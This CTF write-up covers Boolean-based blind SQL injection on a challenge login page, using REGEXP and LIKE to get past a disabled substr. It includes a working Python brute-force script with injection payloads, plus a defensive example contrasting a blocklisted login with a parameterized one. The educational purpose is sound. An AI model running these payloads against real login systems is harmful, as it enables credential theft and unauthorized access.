Boolean-based blind injection: a new approach

Preface:

Until now I had only done Boolean-based blind injection as part of ordinary injection practice. This time I worked through a challenge dedicated to Boolean blind injection, learned a lot along the way, and am writing it down here.

0x00: Injection with the REGEXP operator

Testing showed that username=1' or 1=1# returned a "wrong password" response. After a round of tests against the password I moved on and tried Boolean blind injection.

There was no response, which suggests that the substr function is disabled. So how to guess the characters? The method used before was to cut out one character with this function and then compare it; since that is disabled, some other function might be able to do the guessing. Digging around, I found:

MySQL also supports regular-expression matching: the REGEXP operator performs a regular-expression match.

Try regexp and see whether it can be used: brute-force it and watch whether a "wrong password" response shows up for some inputs. If it does, the operator works and can be used as follows.

Generate a dictionary and run it:

Brute-forcing shows that there really are two different response lengths, so the operator is usable. The first character of user() is indeed u or U (REGEXP matching is case-insensitive by default), and the full value comes out as user.

The database name could be brute-forced the same way, but testing here showed that order, select and other keywords are disabled, so even with the database name there is no way to take the next step. Looking at the page source instead, I found:

the column names corresponding to the account and the password. Isn't that exactly what is needed? From here you can simply continue guessing:

Each character that is brute-forced out is appended to the prefix and the brute-forcing continues; to brute-force the password, just change the column name. After logging in it is a git leak, which I will not write up.

The script is as follows:
[screenshot of the REGEXP script not reproduced; the LIKE version below differs only in its payload]

0x01: Injection with the SQL LIKE operator

I had seen the LIKE operator tried in an earlier writeup, so I gave it a try as well.

It likewise tests whether the value in the column matches a given pattern, so let's try it:

It turned out to work, so all that is needed is to change the payload in my script above:

import string
import requests


url = 'http://6cb7a820708242519c095809f4e3a7469f362925822e434d.changame.ichunqiu.com/Challenges/login.php'
headers = {'User-Agent': "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"}
# ascii_letters gives every letter, digits gives 0-9
payloads = string.ascii_letters + string.digits
temp = ''
print("username:")
for i in range(40):
    # brute-force the username (or, with the column swapped, the password) one character at a time
    for p in payloads:
        payload = temp + p
        # LIKE searches a column for the given pattern in the WHERE clause;
        # the trailing % asks whether user_n3me (or p3ss_w0rd) starts with payload
        name = "admin' or user_n3me like '{}%' ;#".format(payload)
        data = dict(username=name, passwrod='test')
        res = requests.post(url, headers=headers, data=data)
        # a 12-byte response is the "true" branch of the Boolean oracle
        if len(res.content) == 12:
            temp = temp + p
            # ljust() left-aligns the string and pads it with '.' to width 40
            print(temp.ljust(40, '.'))
            break
    else:
        # no candidate extended the prefix: the whole value has been recovered
        break
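As an added example (not from the original post), the login check below is written twice: once by splicing the input into the SQL text behind a keyword blocklist of the kind the challenge used, and once with bound parameters. It runs against an in-memory SQLite table that reuses the write-up's column names, so the trailing comment is SQLite's `--` rather than MySQL's `#`; the blocklist contents and the row data are assumed.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge's login table. The column
# names user_n3me / p3ss_w0rd come from the write-up; the row is made up.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (user_n3me TEXT, p3ss_w0rd TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

# Keyword blocklist of the kind the write-up describes (substr, order, select
# rejected). The challenge's exact list is unknown; this one is assumed.
BLOCKED = ("substr", "order", "select", "union")


def passes_filter(value):
    """True if the input contains none of the blocked keywords."""
    low = value.lower()
    return not any(word in low for word in BLOCKED)


def login_vulnerable(username, password):
    """Login check that splices the (filtered) input into the SQL text."""
    if not (passes_filter(username) and passes_filter(password)):
        return False
    sql = ("SELECT COUNT(*) FROM users WHERE user_n3me = '{}' "
           "AND p3ss_w0rd = '{}'").format(username, password)
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(username, password):
    """Same check with bound parameters: the input can only ever be a value."""
    sql = "SELECT COUNT(*) FROM users WHERE user_n3me = ? AND p3ss_w0rd = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def like_probe(prefix):
    """The write-up's LIKE prefix probe, with SQLite's -- comment in place of #."""
    return "x' OR user_n3me LIKE '{}%' -- ".format(prefix)


def substr_probe(ch):
    """The substr-based probe that the blocklist catches."""
    return "x' OR substr(user_n3me, 1, 1) = '{}' -- ".format(ch)


def oracle(login, probe):
    """True if `login` accepts the probe despite a deliberately wrong password."""
    return login(probe, "wrong-password")
```

The blocklist stops the substr probe but not the LIKE prefix probe, which still answers true or false about user_n3me with a wrong password; against the parameterized check every probe is just a non-matching username.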

Source: blog.csdn.net/qq_43431158/article/details/104455126